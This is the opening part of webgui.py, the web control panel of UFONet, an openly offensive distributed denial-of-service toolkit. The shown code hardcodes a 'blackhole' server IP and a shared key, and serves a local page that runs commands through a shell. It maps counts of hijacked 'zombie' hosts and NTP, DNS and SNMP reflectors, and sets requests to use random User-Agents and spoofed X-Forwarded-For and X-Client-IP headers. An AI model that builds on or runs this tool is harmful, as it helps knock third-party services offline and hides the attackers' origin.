webgui.py 458 KB

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394959697989910010110210310410510610710810911011111211311411511611711811912012112212312412512612712812913013113213313413513613713813914014114214314414514614714814915015115215315415515615715815916016116216316416516616716816917017117217317417517617717817918018118218318418518618718818919019119219319419519619719819920020120220320420520620720820921021121221321421521621721821922022122222322422522622722822923023123223323423523623723823924024124224324424524624724824925025125225325425525625725825926026126226326426526626726826927027127227327427527627727827928028128228328428528628728828929029129229329429529629729829930030130230330430530630730830931031131231331431531631731831932032132232332432532632732832933033133233333433533633733833934034134234334434534634734834935035135235335435535635735835936036136236336436536636736836937037137237337437537637737837938038138238338438538638738838939039139239339439539639739839940040140240340440540640740840941041141241341441541641741841942042142242342442542642742842943043143243343443543643743843944044144244344444544644744844945045145245345445545645745845946046146246346446546646746846947047147247347447547647747847948048148248348448548648748848949049149249349449549649749849950050150250350450550650750850951051151251351451551651751851952052152252352452552652752852953053153253353453553653753853954054154254354454554654754854955055155255355455555655755855956056156256356456556656756856957057157257357457557657757857958058158258358458558658758858959059159259359459559659759859960060160260360460560660760860961061161261361461561661761861962062162262362462562662762862963063163263363463563663763863964064164264364464564664764864965065165265365465565665765865966066166266366466566666766866967067167267367467567667767867968068168268368468568668768868969069169269369469569669769869970070170270370470570670770870971071171271371471571671771871972072172272372472572672772872973073173273373473573673773873974074174274374474574674774874975075175275375475575675775875976076176276376476576676776876977077177277377477577677777877978078178278378478578678778878979079179279379479579679779879980080180280380480580680780880981081181281381481581681781881982082182282382482582682782882983083183283383483583683783883984084184284384484584684784884985085185285385485585685785885986086186286386486586686786886987087187287387487587687787887988088188288388488588688788888989089189289389489589689789889990090190290390490590690790890991091191291391491591691791891992092192292392492592692792892993093193293393493593693793893994094194294394494594694794894995095195295395495595695795895996096196296396496596696796896997097197297397497597697797897998098198298398498598698798898999099199299399499599699799899910001001100210031004100510061007100810091010101110121013101410151016101710181019102010211022102310241025102610271028102910301031103210331034103510361037103810391040104110421043104410451046104710481049105010511052105310541055105610571058105910601061106210631064106510661067106810691070107110721073107410751076107710781079108010811082108310841085108610871088108910901091109210931094109510961097109810991100110111021103110411051106110711081109111011111112111311141115111611171118111911201121112211231124112511261127112811291130113111321133113411351136113711381139114011411142114311441145114611471148114911501151115211531154115511561157115811591160116111621163116411651166116711681169117011711172117311741175117611771178117911801181118211831184118511861187118811891190119111921193119411951196119711981199120012011202120312041205120612071208120912101211121212131214121512161217121812191220122112221223122412251226122712281229123012311232123312341235123612371238123912401241124212431244124512461247124812491250125112521253125412551256125712581259126012611262126312641265126612671268126912701271127212731274127512761277127812791280128112821283128412851286128712881289129012911292129312941295129612971298129913001301130213031304130513061307130813091310131113121313131413151316131713181319132013211322132313241325132613271328132913301331133213331334133513361337133813391340134113421343134413451346134713481349135013511352135313541355135613571358135913601361136213631364136513661367136813691370137113721373137413751376137713781379138013811382138313841385138613871388138913901391139213931394139513961397139813991400140114021403140414051406140714081409141014111412141314141415141614171418141914201421142214231424142514261427142814291430143114321433143414351436143714381439144014411442144314441445144614471448144914501451145214531454145514561457145814591460146114621463146414651466146714681469147014711472147314741475147614771478147914801481148214831484148514861487148814891490149114921493149414951496149714981499150015011502150315041505150615071508150915101511151215131514151515161517151815191520152115221523152415251526152715281529153015311532153315341535153615371538153915401541154215431544154515461547154815491550155115521553155415551556155715581559156015611562156315641565156615671568156915701571157215731574157515761577157815791580158115821583158415851586158715881589159015911592159315941595159615971598159916001601160216031604160516061607160816091610161116121613161416151616161716181619162016211622162316241625162616271628162916301631163216331634163516361637163816391640164116421643164416451646164716481649165016511652165316541655165616571658165916601661166216631664166516661667166816691670167116721673167416751676167716781679168016811682168316841685168616871688168916901691169216931694169516961697169816991700170117021703170417051706170717081709171017111712171317141715171617171718171917201721172217231724172517261727172817291730173117321733173417351736173717381739174017411742174317441745174617471748174917501751175217531754175517561757175817591760176117621763176417651766176717681769177017711772177317741775177617771778177917801781178217831784178517861787178817891790179117921793179417951796179717981799180018011802180318041805180618071808180918101811181218131814181518161817181818191820182118221823182418251826182718281829183018311832183318341835183618371838183918401841184218431844184518461847184818491850185118521853185418551856185718581859186018611862186318641865186618671868186918701871187218731874187518761877187818791880188118821883188418851886188718881889189018911892189318941895189618971898189919001901190219031904190519061907190819091910191119121913191419151916191719181919192019211922192319241925192619271928192919301931193219331934193519361937193819391940194119421943194419451946194719481949195019511952195319541955195619571958195919601961196219631964196519661967196819691970197119721973197419751976197719781979198019811982198319841985198619871988198919901991199219931994199519961997199819992000200120022003200420052006200720082009201020112012201320142015201620172018201920202021202220232024202520262027202820292030203120322033203420352036203720382039204020412042204320442045204620472048204920502051205220532054205520562057205820592060206120622063206420652066206720682069207020712072207320742075207620772078207920802081208220832084208520862087208820892090209120922093209420952096209720982099210021012102210321042105210621072108210921102111211221132114211521162117211821192120212121222123212421252126212721282129213021312132213321342135213621372138213921402141214221432144214521462147214821492150215121522153215421552156215721582159216021612162216321642165216621672168216921702171217221732174217521762177217821792180218121822183218421852186218721882189219021912192219321942195219621972198219922002201220222032204220522062207220822092210221122122213221422152216221722182219222022212222222322242225222622272228222922302231223222332234223522362237223822392240224122422243224422452246224722482249225022512252225322542255225622572258225922602261226222632264226522662267226822692270227122722273227422752276227722782279228022812282228322842285228622872288228922902291229222932294229522962297229822992300230123022303230423052306230723082309231023112312231323142315231623172318231923202321232223232324232523262327232823292330233123322333233423352336233723382339234023412342234323442345234623472348234923502351235223532354235523562357235823592360236123622363236423652366236723682369237023712372237323742375237623772378237923802381238223832384238523862387238823892390239123922393239423952396239723982399240024012402240324042405240624072408240924102411241224132414241524162417241824192420242124222423242424252426242724282429243024312432243324342435243624372438243924402441244224432444244524462447244824492450245124522453245424552456245724582459246024612462246324642465246624672468246924702471247224732474247524762477247824792480248124822483248424852486248724882489249024912492249324942495249624972498249925002501250225032504250525062507250825092510251125122513251425152516251725182519252025212522252325242525252625272528252925302531253225332534253525362537253825392540254125422543254425452546254725482549255025512552255325542555255625572558255925602561256225632564256525662567256825692570257125722573257425752576257725782579258025812582258325842585258625872588258925902591259225932594259525962597259825992600260126022603260426052606260726082609261026112612261326142615261626172618261926202621262226232624262526262627262826292630263126322633263426352636263726382639264026412642264326442645264626472648264926502651265226532654265526562657265826592660266126622663266426652666266726682669267026712672267326742675267626772678267926802681268226832684268526862687268826892690269126922693269426952696269726982699270027012702270327042705270627072708270927102711271227132714271527162717271827192720272127222723272427252726272727282729273027312732273327342735273627372738273927402741274227432744274527462747274827492750275127522753275427552756275727582759276027612762276327642765276627672768276927702771277227732774277527762777277827792780278127822783278427852786278727882789279027912792279327942795279627972798279928002801280228032804280528062807280828092810281128122813281428152816281728182819282028212822282328242825282628272828282928302831283228332834283528362837283828392840284128422843284428452846284728482849285028512852285328542855285628572858285928602861286228632864286528662867286828692870287128722873287428752876287728782879288028812882288328842885288628872888288928902891289228932894289528962897289828992900290129022903290429052906290729082909291029112912291329142915291629172918291929202921292229232924292529262927292829292930293129322933293429352936293729382939294029412942294329442945294629472948294929502951295229532954295529562957295829592960296129622963296429652966296729682969297029712972297329742975297629772978297929802981298229832984298529862987298829892990299129922993299429952996299729982999300030013002300330043005300630073008300930103011301230133014301530163017301830193020302130223023302430253026302730283029303030313032303330343035303630373038303930403041304230433044304530463047304830493050305130523053305430553056305730583059306030613062306330643065306630673068306930703071307230733074307530763077307830793080308130823083308430853086308730883089309030913092309330943095309630973098309931003101310231033104310531063107310831093110311131123113311431153116311731183119312031213122312331243125312631273128312931303131313231333134313531363137313831393140314131423143314431453146314731483149315031513152315331543155315631573158315931603161316231633164316531663167316831693170317131723173317431753176317731783179318031813182318331843185318631873188318931903191319231933194319531963197319831993200320132023203320432053206320732083209321032113212321332143215321632173218321932203221322232233224322532263227322832293230323132323233323432353236323732383239324032413242324332443245324632473248324932503251325232533254325532563257325832593260326132623263326432653266326732683269327032713272327332743275327632773278327932803281328232833284328532863287328832893290329132923293329432953296329732983299330033013302330333043305330633073308330933103311331233133314331533163317331833193320332133223323332433253326332733283329333033313332333333343335333633373338333933403341334233433344334533463347334833493350335133523353335433553356335733583359336033613362336333643365336633673368336933703371337233733374337533763377337833793380338133823383338433853386338733883389339033913392339333943395339633973398339934003401340234033404340534063407340834093410341134123413341434153416341734183419342034213422342334243425342634273428342934303431343234333434343534363437343834393440344134423443344434453446344734483449345034513452345334543455345634573458345934603461346234633464346534663467346834693470347134723473347434753476347734783479348034813482348334843485348634873488348934903491349234933494349534963497349834993500350135023503350435053506350735083509351035113512351335143515351635173518351935203521352235233524352535263527352835293530353135323533353435353536353735383539354035413542354335443545354635473548354935503551355235533554355535563557355835593560356135623563356435653566356735683569357035713572357335743575357635773578357935803581358235833584358535863587358835893590359135923593359435953596359735983599360036013602360336043605360636073608360936103611361236133614361536163617361836193620362136223623362436253626362736283629363036313632363336343635363636373638363936403641364236433644364536463647364836493650365136523653365436553656365736583659366036613662366336643665366636673668366936703671367236733674367536763677367836793680368136823683368436853686368736883689369036913692369336943695369636973698369937003701370237033704370537063707370837093710371137123713371437153716371737183719372037213722372337243725372637273728372937303731373237333734373537363737373837393740374137423743374437453746374737483749375037513752375337543755375637573758375937603761376237633764376537663767376837693770377137723773377437753776377737783779378037813782378337843785378637873788378937903791379237933794379537963797379837993800380138023803380438053806380738083809381038113812381338143815381638173818381938203821382238233824382538263827382838293830383138323833383438353836383738383839384038413842384338443845384638473848384938503851385238533854385538563857385838593860386138623863386438653866386738683869387038713872387338743875387638773878387938803881388238833884388538863887388838893890389138923893389438953896389738983899390039013902390339043905390639073908390939103911391239133914391539163917391839193920392139223923392439253926392739283929393039313932393339343935393639373938393939403941394239433944394539463947394839493950395139523953395439553956395739583959396039613962396339643965396639673968396939703971397239733974397539763977397839793980398139823983398439853986398739883989399039913992399339943995399639973998399940004001400240034004400540064007400840094010401140124013401440154016401740184019402040214022402340244025402640274028402940304031403240334034403540364037403840394040404140424043404440454046404740484049405040514052405340544055405640574058405940604061406240634064406540664067406840694070407140724073407440754076407740784079408040814082408340844085408640874088408940904091409240934094409540964097409840994100410141024103410441054106410741084109411041114112411341144115411641174118411941204121412241234124412541264127412841294130413141324133413441354136413741384139414041414142414341444145414641474148414941504151415241534154415541564157415841594160416141624163416441654166416741684169417041714172417341744175417641774178417941804181418241834184418541864187418841894190419141924193419441954196419741984199420042014202420342044205420642074208420942104211421242134214421542164217421842194220422142224223422442254226422742284229423042314232423342344235423642374238423942404241424242434244424542464247424842494250425142524253425442554256425742584259426042614262426342644265426642674268426942704271427242734274427542764277427842794280428142824283428442854286428742884289429042914292429342944295429642974298429943004301430243034304430543064307430843094310431143124313431443154316431743184319432043214322432343244325432643274328432943304331433243334334433543364337433843394340434143424343434443454346434743484349435043514352435343544355435643574358435943604361436243634364436543664367436843694370437143724373437443754376437743784379438043814382438343844385438643874388438943904391439243934394439543964397439843994400440144024403440444054406440744084409441044114412441344144415441644174418441944204421442244234424442544264427442844294430443144324433443444354436443744384439444044414442444344444445444644474448444944504451445244534454445544564457445844594460446144624463446444654466446744684469447044714472447344744475447644774478447944804481448244834484448544864487448844894490449144924493449444954496449744984499450045014502450345044505450645074508450945104511451245134514451545164517451845194520452145224523452445254526452745284529453045314532453345344535453645374538453945404541454245434544454545464547454845494550455145524553455445554556455745584559456045614562456345644565456645674568456945704571457245734574457545764577457845794580458145824583458445854586458745884589459045914592459345944595459645974598459946004601460246034604460546064607460846094610461146124613461446154616461746184619462046214622462346244625462646274628462946304631463246334634463546364637463846394640464146424643464446454646464746484649465046514652465346544655465646574658465946604661466246634664466546664667466846694670467146724673467446754676467746784679468046814682468346844685468646874688468946904691469246934694469546964697469846994700470147024703470447054706470747084709471047114712471347144715471647174718471947204721472247234724472547264727472847294730473147324733473447354736473747384739474047414742474347444745474647474748474947504751475247534754475547564757475847594760476147624763476447654766476747684769477047714772477347744775477647774778477947804781478247834784478547864787478847894790479147924793479447954796479747984799480048014802480348044805480648074808480948104811481248134814481548164817481848194820482148224823482448254826482748284829483048314832483348344835483648374838483948404841484248434844484548464847484848494850485148524853485448554856485748584859486048614862486348644865486648674868486948704871487248734874487548764877487848794880488148824883488448854886488748884889489048914892489348944895489648974898489949004901490249034904490549064907490849094910491149124913491449154916491749184919492049214922492349244925492649274928492949304931493249334934493549364937493849394940494149424943494449454946494749484949495049514952495349544955495649574958495949604961496249634964496549664967496849694970497149724973497449754976497749784979498049814982498349844985498649874988498949904991499249934994499549964997499849995000500150025003500450055006500750085009501050115012501350145015501650175018501950205021502250235024502550265027502850295030503150325033503450355036503750385039504050415042504350445045504650475048504950505051505250535054505550565057505850595060506150625063506450655066506750685069507050715072507350745075507650775078507950805081508250835084508550865087508850895090509150925093509450955096509750985099510051015102510351045105510651075108510951105111511251135114511551165117511851195120512151225123512451255126512751285129513051315132513351345135513651375138513951405141514251435144514551465147514851495150515151525153515451555156515751585159516051615162516351645165516651675168516951705171517251735174517551765177517851795180518151825183518451855186518751885189519051915192519351945195519651975198519952005201520252035204520552065207520852095210521152125213521452155216521752185219522052215222522352245225522652275228522952305231523252335234523552365237523852395240524152425243524452455246524752485249525052515252525352545255525652575258525952605261526252635264526552665267526852695270527152725273527452755276527752785279528052815282528352845285528652875288528952905291529252935294529552965297529852995300530153025303530453055306530753085309531053115312531353145315531653175318531953205321532253235324532553265327532853295330533153325333533453355336533753385339534053415342534353445345534653475348534953505351535253535354535553565357535853595360536153625363536453655366536753685369537053715372537353745375537653775378537953805381538253835384538553865387538853895390539153925393539453955396539753985399540054015402540354045405540654075408540954105411541254135414541554165417541854195420542154225423542454255426542754285429543054315432543354345435543654375438543954405441544254435444544554465447544854495450545154525453545454555456545754585459546054615462546354645465546654675468546954705471547254735474547554765477547854795480548154825483548454855486548754885489549054915492549354945495549654975498549955005501550255035504550555065507550855095510551155125513551455155516551755185519552055215522552355245525552655275528552955305531553255335534553555365537553855395540554155425543554455455546554755485549555055515552555355545555555655575558555955605561556255635564556555665567556855695570557155725573557455755576557755785579558055815582558355845585558655875588558955905591559255935594559555965597559855995600560156025603560456055606560756085609561056115612561356145615561656175618561956205621562256235624562556265627562856295630563156325633563456355636563756385639564056415642564356445645564656475648564956505651565256535654565556565657565856595660566156625663566456655666566756685669567056715672567356745675567656775678567956805681568256835684568556865687568856895690569156925693569456955696569756985699570057015702570357045705570657075708570957105711571257135714571557165717571857195720572157225723572457255726572757285729573057315732573357345735573657375738573957405741574257435744574557465747574857495750575157525753575457555756575757585759576057615762576357645765576657675768576957705771577257735774577557765777577857795780578157825783578457855786578757885789579057915792579357945795579657975798579958005801580258035804580558065807580858095810581158125813581458155816581758185819582058215822582358245825582658275828582958305831583258335834583558365837583858395840584158425843584458455846584758485849585058515852585358545855585658575858585958605861586258635864586558665867586858695870587158725873587458755876587758785879588058815882588358845885588658875888588958905891589258935894589558965897589858995900590159025903590459055906590759085909591059115912591359145915591659175918591959205921592259235924592559265927592859295930593159325933593459355936593759385939594059415942594359445945594659475948594959505951595259535954595559565957595859595960596159625963596459655966596759685969597059715972597359745975597659775978597959805981598259835984598559865987598859895990599159925993599459955996599759985999600060016002600360046005600660076008600960106011601260136014601560166017601860196020602160226023602460256026602760286029603060316032603360346035603660376038603960406041604260436044604560466047604860496050605160526053605460556056605760586059606060616062606360646065606660676068606960706071607260736074607560766077607860796080608160826083608460856086608760886089609060916092609360946095609660976098609961006101610261036104610561066107610861096110611161126113611461156116611761186119612061216122612361246125612661276128612961306131613261336134613561366137613861396140614161426143614461456146614761486149615061516152615361546155615661576158615961606161616261636164616561666167616861696170617161726173617461756176617761786179618061816182618361846185618661876188618961906191619261936194619561966197619861996200620162026203620462056206620762086209621062116212621362146215621662176218621962206221622262236224622562266227622862296230623162326233623462356236623762386239624062416242624362446245624662476248624962506251625262536254625562566257625862596260626162626263626462656266626762686269627062716272627362746275627662776278627962806281628262836284628562866287628862896290629162926293629462956296629762986299630063016302630363046305630663076308630963106311631263136314631563166317631863196320632163226323632463256326632763286329633063316332633363346335633663376338633963406341634263436344634563466347634863496350635163526353635463556356635763586359636063616362636363646365636663676368636963706371637263736374637563766377637863796380638163826383638463856386638763886389639063916392639363946395639663976398639964006401640264036404640564066407640864096410641164126413641464156416641764186419642064216422642364246425642664276428642964306431643264336434643564366437643864396440644164426443644464456446644764486449645064516452645364546455645664576458645964606461646264636464646564666467646864696470647164726473647464756476647764786479648064816482648364846485648664876488648964906491649264936494649564966497649864996500650165026503650465056506650765086509651065116512651365146515651665176518651965206521652265236524652565266527652865296530653165326533653465356536653765386539654065416542654365446545654665476548654965506551655265536554655565566557655865596560656165626563656465656566656765686569657065716572657365746575657665776578657965806581658265836584658565866587658865896590659165926593659465956596659765986599660066016602660366046605660666076608660966106611661266136614661566166617661866196620662166226623662466256626662766286629663066316632663366346635663666376638663966406641664266436644664566466647664866496650665166526653665466556656665766586659666066616662666366646665666666676668666966706671667266736674667566766677667866796680668166826683668466856686668766886689669066916692669366946695669666976698669967006701670267036704670567066707670867096710671167126713671467156716671767186719672067216722672367246725672667276728672967306731673267336734673567366737673867396740674167426743674467456746674767486749675067516752675367546755675667576758675967606761676267636764676567666767676867696770677167726773677467756776677767786779678067816782678367846785678667876788678967906791679267936794679567966797679867996800680168026803680468056806680768086809681068116812681368146815681668176818681968206821682268236824682568266827682868296830683168326833683468356836683768386839684068416842684368446845684668476848684968506851685268536854685568566857685868596860686168626863686468656866686768686869687068716872687368746875687668776878687968806881688268836884688568866887688868896890689168926893689468956896689768986899690069016902690369046905690669076908690969106911691269136914691569166917691869196920692169226923692469256926692769286929693069316932693369346935693669376938693969406941694269436944694569466947694869496950695169526953695469556956695769586959696069616962696369646965696669676968696969706971697269736974697569766977697869796980698169826983698469856986698769886989699069916992699369946995699669976998699970007001700270037004700570067007700870097010701170127013701470157016701770187019702070217022702370247025702670277028702970307031703270337034703570367037703870397040704170427043704470457046704770487049705070517052705370547055705670577058705970607061706270637064706570667067706870697070707170727073707470757076707770787079708070817082708370847085708670877088708970907091709270937094709570967097709870997100710171027103710471057106710771087109711071117112711371147115711671177118711971207121712271237124712571267127712871297130713171327133713471357136713771387139714071417142714371447145714671477148714971507151715271537154715571567157715871597160716171627163716471657166716771687169717071717172717371747175717671777178717971807181718271837184718571867187718871897190719171927193719471957196719771987199720072017202720372047205720672077208720972107211721272137214721572167217721872197220722172227223722472257226722772287229723072317232723372347235723672377238723972407241724272437244724572467247724872497250725172527253725472557256725772587259726072617262726372647265726672677268726972707271727272737274727572767277727872797280728172827283728472857286728772887289729072917292729372947295729672977298729973007301730273037304730573067307730873097310731173127313731473157316731773187319732073217322732373247325732673277328732973307331733273337334733573367337733873397340734173427343734473457346734773487349735073517352735373547355735673577358735973607361736273637364736573667367736873697370737173727373737473757376737773787379738073817382738373847385738673877388
  1. #!/usr/bin/env python3
  2. # -*- coding: utf-8 -*-"
  3. """
  4. This file is part of the UFONet project, https://ufonet.03c8.net
  5. Copyright (c) 2013/2020 | psy <epsylon@riseup.net>
  6. You should have received a copy of the GNU General Public License along
  7. with UFONet; if not, write to the Free Software Foundation, Inc., 51
  8. Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
  9. """
  10. #######WORKAROUND PYTHON(3) VERSIONS####################
  11. import platform
  12. python_version = "python"+platform.python_version_tuple()[0]+"."+platform.python_version_tuple()[1]
  13. #######################################################
  14. import socket, threading, re, os, time, random, base64
  15. import webbrowser, subprocess, json, sys, requests
  16. import urllib.request, urllib.error, urllib.parse
  17. from urllib.parse import urlparse as urlparse
  18. from core.tools.crypter import Cipher
  19. from time import gmtime, strftime, strptime
  20. from Crypto.Cipher import AES
  21. from hashlib import sha1, sha256
  22. from decimal import Decimal
  23. from random import shuffle
  24. from .options import UFONetOptions
  25. from .main import UFONet
  26. from core.tools.abductor import Abductor
  27. #######SET-YOUR-BLACKHOLE-CONF-HERE###############################D
  28. default_blackhole = '176.28.23.46' # default blackhole #
  29. crypto_key = "U-NATi0n!" # default enc/dec (+moderator board) key #
  30. ###################################################################
  31. browser_init_page = "https://searchencrypt.com" # initial webpage for ship.browser [OK! 06/06/2020]
  32. check_ip_service1 = 'https://checkip.org/' # set external check ip service 1 [OK! 06/06/2020]
  33. check_ip_service2 = 'https://whatismyip.org/' # set external check ip service 2 [OK! 06/06/2020]
  34. check_ip_service3 = 'https://ip.42.pl/ra' # set external check ip service 3 [OK! [06/06/2020]
  35. blackhole_sep = "|" # blackhole stream separator
  36. board_msg_sep = "#!#" # board stream separator
  37. grid_msg_sep = "#?#" # grid stream seperator
  38. wargames_msg_sep = "#-#" # wargames stream seperator
  39. links_msg_sep = "#L#" # links stream separator
  40. streams_msg_sep = "#S#" # streams stream separator
  41. games_msg_sep = "#G#" # games stream separator
  42. globalnet_msg_sep = "#$#" # globalnet stream separator
  43. host = "0.0.0.0"
  44. port = 9999
  45. class ClientThread(threading.Thread):
  46. def __init__(self, ip, port, socket):
  47. threading.Thread.__init__(self)
  48. self.ip = ip
  49. self.port = port
  50. self.socket = socket
  51. self.pages = Pages()
  52. def run(self):
  53. req = self.socket.recv(2048)
  54. res = self.pages.get(req)
  55. if res is None:
  56. self.socket.close()
  57. return
  58. out = "HTTP/1.0 %s\r\n" % res["code"]
  59. out += "Content-Type: %s\r\n\r\n" % res["ctype"]
  60. out += "%s" % res["html"]
  61. try:
  62. self.socket.send(out.encode('utf-8'))
  63. except:
  64. self.socket.send(out)
  65. self.socket.close()
  66. if "run" in res and len(res["run"]):
  67. subprocess.Popen(res["run"], shell=True)
  68. class Pages():
  69. def file_len(self, fn):
  70. with open(fn) as f:
  71. for i, l in enumerate(f):
  72. pass
  73. return i + 1
  74. def html_army_map(self,target=None):
  75. try:
  76. target_js="total_zombies = "+str( int(self.file_len(self.zombies_file))+int(self.file_len(self.aliens_file))+int(self.file_len(self.droids_file))+int(self.file_len(self.ucavs_file))+int(self.file_len(self.rpcs_file))+int(self.file_len(self.ntps_file))+int(self.file_len(self.dnss_file))+int(self.file_len(self.snmps_file)) )+"\ninitMap()\n\n"
  77. except:
  78. target_js="not any zombie available\n\n"
  79. if target is not None:
  80. target_js += "$('#ufomsg').load('/js/ajax.js?doll="+target+"')\n"
  81. return self.pages["/header"] + """
  82. <link rel="stylesheet" href="/js/style.css" />
  83. <link rel="stylesheet" href="/js/ajaxmap.css" />
  84. <link rel="stylesheet" href="/js/leaflet/leaflet.css" />
  85. <link rel="stylesheet" href="/js/cluster/MarkerCluster.Default.css"/>
  86. <link rel="stylesheet" href="/js/cluster/MarkerCluster.css"/>
  87. <script src="/js/leaflet/leaflet.js"></script>
  88. <script src="/js/cluster/leaflet.markercluster-src.js"></script>
  89. <script src="/js/jquery-1.10.2.min.js"></script>
  90. <script src="/js/rlayer-src.js"></script>
  91. <script src="/js/raphael.js"></script>
  92. <script src="/js/ufo.js"></script>
  93. <script src="/js/ajax.js"></script>
  94. </head><body bgcolor="black" text="black">
  95. <div id="wrapper">
  96. <div id="map" style="width: 100%; height: 100%"></div>
  97. </div>
  98. <script type="text/javascript">
  99. window.onload = function(){
  100. """+target_js+"""
  101. }
  102. </script>
  103. <center>
  104. """ + self.pages["/footer"]
  105. def html_request_submit(self):
  106. return self.pages["/header"]+"""<script>
  107. window.setTimeout(window.close,1234)
  108. </script></head><body bgcolor="black" text="yellow" style="font-family:Courier, 'Courier New', monospace;" >
  109. <center>settings updated"""+self.pages["/footer"]
  110. def html_requests(self):
  111. # read requests configuration file (json)
  112. try:
  113. with open(self.mothership_webcfg_file) as data_file:
  114. data = json.load(data_file)
  115. except:
  116. if os.path.exists(self.mothership_webcfg_file) == True:
  117. print('[Error] [AI] Cannot open: "core/json/webcfg.json" -> [Aborting!]\n')
  118. return
  119. else: # generate default requests configuration file
  120. print('[Info] [AI] Cannot found: "core/json/webcfg.json" -> [Generating!]')
  121. with open(self.mothership_webcfg_file, "w") as f:
  122. json.dump({"rproxy": "NONE", "ruseragent": "RANDOM", "rreferer": "RANDOM", "rhost": "NONE", "rxforw": "on", "rxclient": "on", "rtimeout": "10", "rretries": "1", "rdelay": "0", "threads": "5", "rssl": "off"}, f, indent=4)
  123. # set values of requests configuration from json file to html form
  124. with open(self.mothership_webcfg_file) as data_file:
  125. data = json.load(data_file)
  126. self.agents = [] # generating available user-agents
  127. f = open(self.agents_file)
  128. agents = f.readlines()
  129. f.close()
  130. for agent in agents:
  131. self.agents.append(agent)
  132. self.user_agent = random.choice(self.agents).strip()
  133. self.rproxy = data["rproxy"]
  134. if self.rproxy == "NONE":
  135. self.rproxy = ""
  136. self.ruseragent = data["ruseragent"]
  137. if self.ruseragent == "RANDOM":
  138. self.ruseragent = self.user_agent # random user-agent
  139. self.rreferer = data["rreferer"]
  140. if self.rreferer == "RANDOM":
  141. self.rreferer = self.referer # random referer
  142. self.rhost = data["rhost"]
  143. if self.rhost == "NONE":
  144. self.rhost = ""
  145. self.rxforw = data["rxforw"]
  146. if self.rxforw == "on":
  147. self.rxforw_check = 'checked'
  148. else:
  149. self.rxforw_check = ''
  150. self.rxclient = data["rxclient"]
  151. if self.rxclient == "on":
  152. self.rxclient_check = 'checked'
  153. else:
  154. self.rxclient_check = ''
  155. self.rtimeout = data["rtimeout"]
  156. self.rretries = data["rretries"]
  157. self.rdelay = data["rdelay"]
  158. self.threads = data["threads"]
  159. self.rssl = data["rssl"]
  160. if self.rssl == "on":
  161. self.rssl_check = 'checked'
  162. else:
  163. self.rssl_check = ''
  164. return self.pages["/header"] + """
  165. <script language="javascript">
  166. function Requests() {
  167. var win_requests = window.open("requests","_parent","fullscreen=no, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  168. }
  169. </script>
  170. </head><body bgcolor="black" text="yellow" style="font-family: Courier, 'Courier New', monospace;" ><center><pre>
  171. <u>Configure requests:</u>
  172. <table cellpadding="2" cellspacing="2">
  173. <form method='GET'>
  174. <tr>
  175. <td> Use proxy server:</td>
  176. <td> <input type="text" name="rproxy" value='"""+str(self.rproxy)+"""'></td>
  177. </tr>
  178. <tr>
  179. <td> Use another HTTP User-Agent header:</td>
  180. <td> <input type="text" name="ruseragent" value='"""+str(self.ruseragent)+"""'></td>
  181. </tr>
  182. <tr>
  183. <td> Use another HTTP Referer header:</td>
  184. <td> <input type="text" name="rreferer" value='"""+str(self.rreferer)+"""'></td>
  185. </tr>
  186. <tr>
  187. <td> Use another HTTP Host header:</td>
  188. <td> <input type="text" name="rhost" value='"""+str(self.rhost)+"""'></td>
  189. </tr>
  190. <tr>
  191. <td> Set your HTTP X-Forwarded-For with random IP values:</td>
  192. <td> <input type="checkbox" name='rxforw' """+self.rxforw_check+"""></td>
  193. </tr>
  194. <tr>
  195. <td> Set your HTTP X-Client-IP with random IP values:</td>
  196. <td> <input type="checkbox" name='rxclient' """+self.rxclient_check+"""></td>
  197. </tr>
  198. <tr>
  199. <td> Select your timeout:</td>
  200. <td> <input type="text" name="rtimeout" value='"""+str(self.rtimeout)+"""'></td>
  201. </tr>
  202. <tr>
  203. <td> Retries when the connection timeouts:</td>
  204. <td> <input type="text" name="rretries" value='"""+str(self.rretries)+"""'></td>
  205. </tr>
  206. <tr>
  207. <td> Delay in seconds between each HTTP request:</td>
  208. <td> <input type="text" name="rdelay" value='"""+str(self.rdelay)+"""'></td>
  209. </tr>
  210. <tr>
  211. <td> Number of threads:</td>
  212. <td> <input type="text" name="threads" value='"""+str(self.threads)+"""'></td>
  213. </tr>
  214. <tr>
  215. <td> Force usage of SSL/HTTPS requests:</td>
  216. <td> <input type="checkbox" name='rssl' """+self.rssl_check+"""></td>
  217. </tr>
  218. </table>
  219. <hr>
  220. <input type="hidden" name="update" value="1">
  221. <input type="submit" value="Set!" onclick="Requests()"></pre>
  222. </form>
  223. """ + self.pages["/footer"]
  224. def html_board_profile_submit(self):
  225. return self.pages["/header"]+"""<script>
  226. window.setTimeout(window.close,1234)
  227. </script></head><body bgcolor="black" text="yellow" style="font-family:Courier, 'Courier New', monospace;" >
  228. <center>Board profile updated. Re-enter to see changes..."""+self.pages["/footer"]
  229. def html_grid_profile_submit(self):
  230. return self.pages["/header"]+"""<script>
  231. window.setTimeout(window.close,1234)
  232. </script></head><body bgcolor="black" text="yellow" style="font-family:Courier, 'Courier New', monospace;" >
  233. <center>Grid profile updated. Re-enter to see changes..."""+self.pages["/footer"]
  234. def profile_crew(self, icon):
  235. files = os.listdir("core/images/crew/")
  236. if icon == "NONE":
  237. icon = "link1"
  238. html_stream = ""
  239. html_stream += "<table cellspacing='2' cellpadding='5'><form method='GET'><tr>"
  240. for f in files:
  241. id = str(f.replace(".txt", ""))
  242. value = str(f.replace(".txt", ""))
  243. if icon == value:
  244. checked = " CHECKED"
  245. else:
  246. checked = ""
  247. crew_img = open("core/images/crew/"+value+".txt").read()
  248. html_stream += "<td><input type='radio' name='profile_icon' id='"+id+"' value='"+value+"'"+ checked+"><img src='data:image/png;base64,"+crew_img+"'></td>"
  249. html_stream += "</tr></table>"
  250. return html_stream
  251. def html_board_profile(self):
  252. try:
  253. with open(self.mothership_boardcfg_file) as data_file:
  254. data = json.load(data_file)
  255. except:
  256. if os.path.exists(self.mothership_boardcfg_file) == True:
  257. print('[Error] [AI] Cannot open: "core/json/boardcfg.json" -> [Aborting!]\n')
  258. return
  259. else:
  260. print('[Info] [AI] Cannot found: "core/json/boardcfg.json" -> [Generating!]')
  261. with open(self.mothership_boardcfg_file, "w") as f:
  262. json.dump({"profile_token": "NONE", "profile_icon": "NONE", "profile_nick": "Anonymous"}, f, indent=4)
  263. f.close()
  264. with open(self.mothership_boardcfg_file) as data_file:
  265. data = json.load(data_file)
  266. self.profile_token = str(random.getrandbits(128)) # generating random token hash
  267. self.profile_icon = data["profile_icon"]
